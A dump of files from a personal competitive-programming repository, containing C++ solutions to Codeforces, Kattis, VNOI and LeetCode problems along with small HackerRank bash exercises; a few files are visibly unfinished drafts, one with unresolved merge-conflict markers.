"max_line_length": 51,
"num_lines": 87,
"path": "/vnoi/message.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nconst int NMAX = 8e2 + 3;\r\nint n, m, cnt, connectedComponent = 0;\r\nvector<int> ds[NMAX];\r\nstack<int> st;\r\nint low[NMAX], num[NMAX], inScc[NMAX];\r\nbool inSt[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n int u, v;\r\n cin >> n >> m;\r\n rep(edge, 1, m) {\r\n cin >> u >> v;\r\n ds[u].push_back(v);\r\n }\r\n}\r\n//----------------------------------------\r\nvoid tarjan(int u) {\r\n st.push(u);\r\n inSt[u] = 1;\r\n low[u] = num[u] = ++cnt;\r\n for (auto v: ds[u]) {\r\n if (num[v] == -1) {\r\n tarjan(v);\r\n low[u] = min(low[u], low[v]);\r\n } else if (inSt[v])\r\n low[u] = min(low[u], num[v]);\r\n }\r\n\r\n if (low[u] == num[u]) {\r\n connectedComponent++;\r\n while (true) {\r\n auto curr = st.top();\r\n inSt[curr] = 0;\r\n inScc[curr] = connectedComponent;\r\n st.pop();\r\n if (curr == u) break;\r\n }\r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n memset(low, -1, sizeof(low));\r\n memset(num, -1, sizeof(num));\r\n cnt = 0;\r\n rep(u, 1, n) \r\n if (num[u] == -1) \r\n tarjan(u);\r\n\r\n memset(inSt, 0, sizeof(inSt));\r\n rep(u, 1, n) \r\n for (auto v: ds[u])\r\n if (inScc[u] != inScc[v])\r\n inSt[inScc[v]] = 1;\r\n\r\n int res = 0;\r\n rep(u, 1, connectedComponent)\r\n res += (1 - inSt[u]);\r\n\r\n cout << res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /*\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.5760368704795837,
"alphanum_fraction": 0.5760368704795837,
"avg_line_length": 18.81818199157715,
"blob_id": "8ff62a03920641a66a45d6886cc47f712de73154",
"content_id": "d7fa5580c50a6ee55ba93651ca94883b4f9b8b28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 11,
"path": "/init/init.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nint main() {\n\n}"
},
{
"alpha_fraction": 0.5435185432434082,
"alphanum_fraction": 0.5509259104728699,
"avg_line_length": 29.823530197143555,
"blob_id": "d05d25ca70f5e4586cfcdfdbfc737c52057c6bd0",
"content_id": "20622b0638c2b1d4c60f133fbc62ca763b0441ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1080,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 34,
"path": "/katis/grandpabernie.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nmap<string, int> mapCountry;\r\nvector<vector<int>> visitedCountry;\r\nbool isSorted[100005];\r\n\r\n//----------------------------------------\r\nint main() {\r\n int u, year, currentCountry = -1;\r\n string country;\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n cin >> u;\r\n while (u--) {\r\n cin >> country >> year;\r\n if (mapCountry.find(country) == mapCountry.end()) \r\n mapCountry[country] = ++currentCountry;\r\n int indexCountry = mapCountry[country];\r\n if (indexCountry == currentCountry) \r\n visitedCountry.push_back(vector<int>());\r\n visitedCountry[indexCountry].push_back(year);\r\n }\r\n\r\n cin >> u;\r\n while (u--) {\r\n cin >> country >> year;\r\n int indexCountry = mapCountry[country];\r\n if (isSorted[indexCountry] == false) {\r\n sort(visitedCountry[indexCountry].begin(), visitedCountry[indexCountry].end());\r\n isSorted[indexCountry] = true;\r\n }\r\n cout << visitedCountry[indexCountry][year - 1] << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.40050697326660156,
"alphanum_fraction": 0.41444867849349976,
"avg_line_length": 22.909090042114258,
"blob_id": "4c222b59b146917675cb76edb0f144af44d2a0ff",
"content_id": "63bb4062cf8727c7313314db737d052a9837c4e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 33,
"path": "/leetcode/find_the_duplicate_numbers.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n int findDuplicate(vector<int>& nums) {\n for (int i = 0; i < nums.size(); i++) {\n if (nums[i] == -1) \n continue;\n int org = i, j = i;\n while (nums[j] > 0) {\n int tg = nums[j] - 1;\n nums[j] = -1;\n j = tg;\n }\n if (j != org) {\n return j + 1;\n }\n } \n return -1;\n }\n};\nint main() {\n Solution a = Solution();\n vector<int> v{1, 3, 3, 4};\n int res = a.findDuplicate(v);\n cout << res;\n}\n"
},
{
"alpha_fraction": 0.3764510750770569,
"alphanum_fraction": 0.4046434462070465,
"avg_line_length": 20.535715103149414,
"blob_id": "d46402302490e3e6cd13bc8a46ca522da87a3bee",
"content_id": "c848343a0687e3e8d376c1c0d59863d56bc7c9d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 603,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 28,
"path": "/codeforces/1499B.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nstring s;\nconst int NMAX = 1e2 + 3;\nbool f[NMAX];\n\nvoid process() {\n memset(f, 0, sizeof(f));\n f[0] = 1;\n if (s.length() > 1) \n f[1] = 1;\n for (int i = 2; i < s.size(); i++) {\n f[i] = (f[i - 1] && (s[i - 1] <= s[i]));\n f[i] = f[i] || (s[i - 2] <= s[i] && f[i - 2]);\n }\n cout << ((f[s.length() - 1] || (s.length() > 1 && f[s.length() - 2])) ? \"YES\": \"NO\") << endl;\n}\n\nint main() {\n // freopen(\"test.inp\", \"r\", stdin);\n int test;\n cin >> test;\n while (test--) {\n cin >> s;\n process();\n }\n}\n"
},
{
"alpha_fraction": 0.3177664875984192,
"alphanum_fraction": 0.3238578736782074,
"avg_line_length": 22.452381134033203,
"blob_id": "1948023c0a8544dae06c405f60fd7b556e6eea59",
"content_id": "5665c7efe217e21510df1bfb2bfffd6a64a2f74e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 985,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 42,
"path": "/codeforces/1506B.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i <= b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i >= b; i -= step)\n#define it(x, s) for (auto x:s)\n\nint n, k;\nstring s;\n\n//-----------------------------------------------------------\nvoid openf() {\n cin >> n >> k;\n cin >> s;\n}\n//-----------------------------------------------------------\nvoid process() {\n int i = s.find('*');\n int cnt = 1;\n while (true) {\n // cout << i << endl;\n int t = -1;\n rep(j, 1, k, 1) \n if (i + j < s.length() && s[i + j] == '*')\n t = j;\n i = i + t;\n if (t == -1) break;\n cnt += 1;\n // cout << i << \" \" << t << endl;\n }\n cout << cnt << endl;\n}\n//-----------------------------------------------------------\nint main() {\n // freopen(\"test.inp\", \"r\", stdin);\n int test; \n cin >> test;\n while (test--) {\n openf();\n process();\n }\n}\n"
},
{
"alpha_fraction": 0.6137820482254028,
"alphanum_fraction": 0.6618589758872986,
"avg_line_length": 30.100000381469727,
"blob_id": "201904e87e89f8d595a1bd8084e1e3abc6379b9f",
"content_id": "73934ccc27c72746b42df81c06a4c942316fee62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 624,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/leetcode/PalindromeNumber.java",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "<<<<<<< HEAD\n\npublic class PalindromeNumber {\n public boolean isPalindrome(int x) {\n var tmpX = String.valueOf(x);\n return tmpX.equals(new StringBuilder(tmpX).reverse().toString());\n }\n\n public static void main(String[] args) {\n var palindrome = new PalindromeNumber();\n System.out.println(palindrome.isPalindrome(121));\n System.out.println(palindrome.isPalindrome(-121));\n System.out.println(palindrome.isPalindrome(10));\n }\n=======\npublic class PalindromeNumber {\r\n public static void main(String[] args) {\r\n }\r\n>>>>>>> ab9b0d586098bc648496ece1c2e6bb61f2dcf16d\n}"
},
{
"alpha_fraction": 0.4368230998516083,
"alphanum_fraction": 0.45216605067253113,
"avg_line_length": 23.227272033691406,
"blob_id": "014d926340ad9086a5fc5d5f59430a072b69cbee",
"content_id": "66688a342ae28584de4c34bcf315d601041430af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 44,
"path": "/katis/template.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n#define iterate(x, z) for (auto x:z)\r\n#define decon(a) show(a); for (auto x: a) cout << x << \" \"; cout << endl\r\n#define debug(x) show(x); cout << x << \" \" << endl;\r\n#define dearr(a, n) show(a); for (int i = 1; i <= n; i++) cout << a[i] << \" \"; cout << endl\r\n#define show(a) cout << #a << \": \"\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\nconst int oo = 1e9 + 3;\r\nstruct Edge {\r\n int u, v, cost;\r\n Edge(int tu, int tv, int tcost) {\r\n u = tu; v = tv; cost = tcost;\r\n }\r\n};\r\n\r\ntypedef complex<double> Point;\r\n\r\nconst int NMAX = 1e5 + 3;\r\n\r\nint n, m;\r\nvector<int> ds[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n}\r\n//----------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.5484848618507385,
"alphanum_fraction": 0.5515151619911194,
"avg_line_length": 18.625,
"blob_id": "e3460737f087688f1c1d654e585b263a8ed3607c",
"content_id": "512540b2e45a52b3700d5d7facbd153e98cdba79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 16,
"path": "/leetcode/two_sum.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n\r\nclass Solution {\r\n\tpublic:\r\n\t\tvector<int> twoSum(vector<int>& nums, int target) {\r\n\t\t\tsort(nums.begin(), nums.end());\t\t\t\r\n\t\t\tfor (auto ind = nums.begin(), ind != nums.end(), ind++) {\r\n\t\t\t\tif (binary_search(ind + 1, nums.end(), target - *ind))\r\n\t\t\t}\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n}\r\n"
},
{
"alpha_fraction": 0.3463687002658844,
"alphanum_fraction": 0.3600248396396637,
"avg_line_length": 25.3389835357666,
"blob_id": "65ae5589076a3b6f3cbfb7def6cf89a1b806d46d",
"content_id": "3c59ff4518503b472096668dd97526a9f4e3811b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1611,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 59,
"path": "/codeforces/272622H.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i <= b; i--)\r\n\r\nconst int NMAX = 1e3 + 3;\r\n\r\nint x, a, b, y, n;\r\npair<int, int> f[NMAX][NMAX];\r\n\r\nvoid openf() {\r\n cin >> x >> a >> y >> b >> n;\r\n}\r\n//--------------------------------------------------\r\npair<int, int> newState(pair<int, int> oldState, int value, int mid) {\r\n return (oldState.second + value < mid) ?\r\n make_pair(oldState.first, oldState.second + value) : make_pair(oldState.first + 1, 0); \r\n}\r\n//--------------------------------------------------\r\nbool check(int mid) {\r\n rep(i, 0, x)\r\n rep(j, 0, y)\r\n f[i][j] = make_pair(0, 0);\r\n\r\n rep(i, 0, x)\r\n rep(j, 0, y) {\r\n if (f[i][j].first == n)\r\n return true;\r\n if (i < x)\r\n f[i + 1][j] = max(f[i + 1][j], newState(f[i][j], a, mid));\r\n if (j < y)\r\n f[i][j + 1] = max(f[i][j + 1], newState(f[i][j], b, mid));\r\n }\r\n\r\n return false; \r\n}\r\n//--------------------------------------------------\r\nvoid process() {\r\n int l = 0, r = x * a + y * b, res = 0;\r\n while (l <= r) {\r\n int mid = (l + r) / 2;\r\n if (check(mid)) {\r\n res = mid;\r\n l = mid + 1;\r\n } else r = mid - 1;\r\n }\r\n\r\n cout << res << endl;\r\n}\r\n//--------------------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n // freopen(\"test.out\", \"w\", stdout);\r\n for (int t = 1; t <=2; t++) {\r\n openf();\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.51408451795578,
"alphanum_fraction": 0.5845070481300354,
"avg_line_length": 9.142857551574707,
"blob_id": "d3bd870565ebc57f2519fd1a8e22ab547efdabd0",
"content_id": "6180f07a48f7d9ca2e6703ca11d50e440a67179d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 14,
"path": "/bash/hackerrank/sort.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#sort1\nsort\n#sort2\nsort -r\n#sort3\nsort -n\n#sort4\nsort -nr\n#sort5\nsort -t $'\\t' -k2 -nr\n#sort6\nsort -t $'\\t' -k2 -n\n#sort7\nsort -t '|' -k2 -nr\n"
},
{
"alpha_fraction": 0.6004183888435364,
"alphanum_fraction": 0.6056485176086426,
"avg_line_length": 31.965517044067383,
"blob_id": "a390162ef91bfe2cad3092421ba46c66f86fb047",
"content_id": "554b73c77166b7326abd97ed04fec713a8dced82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 29,
"path": "/leetcode/40.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <vector>\n\nusing namespace std;\n\nclass Solution {\npublic:\n vector<vector<int>> res;\n vector<int> currentCombination;\n vector<vector<int>> combinationSum2(vector<int>& candidates, int target) {\n sort(candidates.begin(), candidates.end());\n tryCombination(candidates, 0, 0, target);\n return res;\n }\n\n void tryCombination(vector<int>& candidates, int currentPos, int currentSum, int target) {\n if (currentSum == target) {\n res.push_back(currentCombination);\n return;\n }\n\n for (int i = currentPos; i < candidates.size(); i++) {\n if (i > currentPos && candidates[i] == candidates[i - 1]) continue;\n if (currentSum + candidates[i] > target) continue;\n currentCombination.push_back(candidates[i]);\n tryCombination(candidates, i + 1, currentSum + candidates[i], target);\n currentCombination.pop_back();\n }\n }\n};\n"
},
{
"alpha_fraction": 0.4277726113796234,
"alphanum_fraction": 0.44641193747520447,
"avg_line_length": 17.18644142150879,
"blob_id": "155001c8e4aa438eed05456378f4b6ab9d3af134",
"content_id": "46f8ee2f28c713ad5d7c1d0e39c6538ec5303ab2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 59,
"path": "/codeforces/1506D.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\n#include <functional>\n#include <queue>\n#include <utility>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i <= b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i >= b; i -= step)\n\nconst int NMAX = 2e5 + 3;\nint n;\nmap<int, int> m;\npriority_queue<pair<int, int>> pq;\n\nvoid openf() {\n int u;\n cin >> n;\n m.clear();\n rep(i, 1, n, 1) {\n cin >> u;\n m[u] += 1;\n }\n}\n\nvoid process() {\n while (!pq.empty()) \n pq.pop();\n for (auto const &p: m) \n pq.push(make_pair(p.second, p.first));\n\n int sz = n;\n while (pq.size() > 1) {\n auto u1 = pq.top();\n pq.pop();\n auto u2 = pq.top();\n pq.pop();\n sz -= 2;\n u1.first -= 1;\n u2.first -= 1;\n \n if (u1.first != 0)\n pq.push(u1);\n if (u2.first != 0)\n pq.push(u2);\n }\n\n cout << sz << endl;\n}\n\n\nint main() {\n// freopen(\"test.inp\", \"r\", stdin);\n int test;\n cin >> test;\n while (test--) {\n openf();\n process();\n }\n}\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.557692289352417,
"avg_line_length": 16.33333396911621,
"blob_id": "8ee2967cd5c9052f56bcb438474c34d6d7082b62",
"content_id": "7f6f4b8bd768767755f03e234413cf2719504d32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 3,
"path": "/bash/hackerrank/arth.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "read arth\nres=$(bc -l <<< $arth)\nprintf \"%.3f\" $res\n"
},
{
"alpha_fraction": 0.5959183573722839,
"alphanum_fraction": 0.5959183573722839,
"avg_line_length": 20.454545974731445,
"blob_id": "3a4f84516bb3c11e0e3308499912d5323eb23413",
"content_id": "62b5c7500bb262d97e62d614f7147d1ff068a1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 245,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 11,
"path": "/katis/katis_different.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define ll long long\r\n\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nint main() {\r\n ll first_number, second_number;\r\n while (cin >> first_number >> second_number) {\r\n cout << abs(second_number - first_number) << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 8,
"blob_id": "c6af4b8f25195da5af971e0a7240bf936d9bb32f",
"content_id": "fc4143984b999d54a833911bc82539e6db23f21b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 4,
"path": "/bash/hackerrank/head.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#head1\nhead -n 20\n#head2\nhead -c 20\n"
},
{
"alpha_fraction": 0.41615384817123413,
"alphanum_fraction": 0.4276922941207886,
"avg_line_length": 22.11111068725586,
"blob_id": "795800547bf02c81f74158bf732a251b9da7a4b4",
"content_id": "a38c77f98f117411e4157b9b59f2685351ce3abf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1300,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 54,
"path": "/katis/pikemaneasy.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int oo = 1e9 + 7;\r\n\r\nint n, contestTime, A, B, C, t0;\r\npriority_queue<int, vector<int>, greater<int>> pq;\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> n >> contestTime;\r\n cin >> A >> B >> C >> t0; \r\n }\r\n//----------------------------------------\r\nvoid process() {\r\n pq.push(t0);\r\n int temp = t0;\r\n rep(i, 1, n - 1) {\r\n temp = (((ll)A * temp + B) % C) + 1;\r\n pq.push(temp);\r\n }\r\n\r\n int maxNumber = 0, penaltyCounter = 0, totalTime = 0;\r\n while (!pq.empty()) {\r\n if (totalTime <= contestTime - pq.top()) {\r\n totalTime += pq.top();\r\n maxNumber += 1;\r\n penaltyCounter = (penaltyCounter + totalTime) % oo;\r\n }\r\n pq.pop();\r\n }\r\n\r\n cout << maxNumber << \" \" << penaltyCounter;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /**\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.44547995924949646,
"alphanum_fraction": 0.4650512635707855,
"avg_line_length": 24.571428298950195,
"blob_id": "2a41e1be0b17aff6c15f8197041c97d22ca6648b",
"content_id": "f440968d2e794ca1602484ad1ecef3c39ca53c3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 42,
"path": "/leetcode/815.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n bool isUsed[503];\n int d[1000003];\n queue<int> q;\n vector<int> routeList[100003];\n int numBusesToDestination(vector<vector<int>>& routes, int source, int target) {\n for (auto i = 0; i < routes.size(); i++)\n for (auto u: routes[i])\n routeList[u].push_back(i);\n\n d[source] = 1;\n q.push(source);\n while (!q.empty()) {\n auto u = q.front();\n q.pop();\n for (auto routeIndex: routeList[u]) {\n if (isUsed[routeIndex]) continue;\n isUsed[routeIndex] = true;\n for (auto v: routes[routeIndex]) {\n if (d[v] != 0) continue;\n d[v] = d[u] + 1;\n q.push(v);\n }\n }\n }\n return d[target] - 1;\n\n }\n}\n\nint main() {\n\n}"
},
{
"alpha_fraction": 0.4482535719871521,
"alphanum_fraction": 0.4702458083629608,
"avg_line_length": 28.352941513061523,
"blob_id": "3b2bccc07cf0c3c2ae731c2a7d33bf9eba2e717f",
"content_id": "9734c1c1b46ba9f7bcd5797c22cad03355ab609d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1546,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 51,
"path": "/katis/collatz.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define fori(i, a, b) for (int i = a; i <= b; i++)\r\n#define ll long long\r\n\r\nmap<ll, int> a;\r\nmap<ll, int> validValue;\r\n//----------------------------------------\r\nvoid process(int firstNum, int secondNum, int cnt) {\r\n ll tempFirstNum = firstNum;\r\n a[tempFirstNum] = 0;\r\n validValue[tempFirstNum] = cnt;\r\n fori(i, 1, 30000) {\r\n if ((tempFirstNum % 2 == 1 && tempFirstNum > (10e18 - 1) / 3) || (tempFirstNum == 1))\r\n break;\r\n if (tempFirstNum % 2 == 0) \r\n tempFirstNum /= 2;\r\n else \r\n tempFirstNum = tempFirstNum * 3 + 1;\r\n if (validValue[tempFirstNum] != cnt) \r\n a[tempFirstNum] = i;\r\n else\r\n break;\r\n validValue[tempFirstNum] = cnt;\r\n }\r\n\r\n ll tempSecondNum = secondNum;\r\n fori(i, 0, 30000) {\r\n if (validValue[tempSecondNum] == cnt) {\r\n cout << firstNum << \" needs \" << a[tempSecondNum] << \" steps, \";\r\n cout << secondNum << \" needs \" << i << \" steps, \";\r\n cout << \"they meet at \" << tempSecondNum;\r\n break;\r\n }\r\n if (tempSecondNum % 2 == 0) \r\n tempSecondNum /= 2;\r\n else \r\n tempSecondNum = tempSecondNum * 3 + 1;\r\n }\r\n cout << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int firstNum, secondNum;\r\n int cnt = 1;\r\n while (cin >> firstNum >> secondNum) {\r\n if (firstNum == 0) break;\r\n process(firstNum, secondNum, cnt++);\r\n }\r\n}"
},
{
"alpha_fraction": 0.290921151638031,
"alphanum_fraction": 0.2995361089706421,
"avg_line_length": 21.81818199157715,
"blob_id": "c5945d76ae08d159367eb83e8ee9180f8ed6578d",
"content_id": "a9ad87b3bf10fba7fd66229a100b05b4ff4a0eb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1509,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 66,
"path": "/codeforces/1506E.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": " #include <bits/stdc++.h>\n using namespace std;\n \n const int NMAX = 2e5 + 3;\n int a[NMAX], n, f[NMAX];\n set<int> se, new_se;\n \n \n void openf() {\n cin >> n;\n for (int i = 1; i <= n; i++)\n cin >> a[i];\n }\n \n void process() {\n for (int i = 1; i <= n; i++)\n f[i] = 0;\n se.clear();\n new_se.clear();\n for (int i = 1; i <= n; i++)\n se.insert(i);\n int cur = 0;\n for (int i = 1; i <= n; i++) {\n if (a[i] > cur) {\n f[i] = a[i];\n cur = a[i];\n se.erase(a[i]);\n }\n }\n for (auto x: se)\n new_se.insert(x);\n \n //find_min\n for (int i = 1; i <= n; i++) {\n if (f[i] == 0) {\n cout << *se.begin();\n se.erase(se.begin());\n }\n else cout << f[i];\n cout << \" \";\n }\n cout << endl;\n \n //find_max\n for (int i = 1; i <= n; i++) {\n if (f[i] == 0) {\n auto it = new_se.lower_bound(a[i]);\n it--;\n cout << *it;\n new_se.erase(it);\n }\n else cout << f[i];\n cout << \" \";\n }\n cout << endl;\n }\n \n int main() {\n //freopen(\"test.inp\", \"r\", stdin);\n int test;\n cin >> test;\n while (test--) {\n openf();\n process();\n }\n }"
},
{
"alpha_fraction": 0.36128661036491394,
"alphanum_fraction": 0.3664560616016388,
"avg_line_length": 29.125,
"blob_id": "219b68d539a30ff553d3a40179b083e9484c2df1",
"content_id": "414efd4a13412c9bfa15d508ace3617ed4c300e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1741,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 56,
"path": "/katis/dream.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nmap<string, int> eventToInt;\r\nstack<string> events; \r\nconst string ERROR = \"Plot Error\";\r\n\r\n//----------------------------------------\r\nint main() {\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n string type, event;\r\n int r, n;\r\n cin >> n;\r\n while (n--) {\r\n cin >> type;\r\n if (type == \"E\") {\r\n cin >> event;\r\n events.push(event);\r\n eventToInt[event] = events.size();\r\n }\r\n else if(type == \"D\") {\r\n cin >> r;\r\n while (r--) {\r\n event = events.top();\r\n eventToInt.erase(event);\r\n events.pop();\r\n }\r\n }\r\n else {\r\n cin >> r;\r\n string res = \"\";\r\n int ma = 0, mi = 1e6;\r\n while (r--) {\r\n cin >> event;\r\n if (res == ERROR) continue;\r\n if (event[0] != '!') {\r\n if (eventToInt.find(event) == eventToInt.end()) //In scenario, but not real\r\n res = ERROR;\r\n else ma = max(ma, eventToInt[event]);\r\n } else {\r\n event = event.substr(1, event.length() - 1);\r\n if (eventToInt.find(event) != eventToInt.end()) //Not in scenario, in real\r\n mi = min(mi, eventToInt[event]);\r\n }\r\n }\r\n\r\n if (res != ERROR)\r\n if (mi == 1e6) res = \"Yes\";\r\n else {\r\n if (mi <= ma) res = \"Plot Error\";\r\n else res = to_string(events.size() - mi + 1) + \" Just A Dream\";\r\n }\r\n cout << res << endl; \r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.3125,
"alphanum_fraction": 0.3253968358039856,
"avg_line_length": 19.489360809326172,
"blob_id": "563d9e6e91ec160eaf5007c846f5b27f9d670143",
"content_id": "732d0a211b5958a6f146c15b7126e86dd673c63f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1008,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 47,
"path": "/katis/supercomputer.cpp",
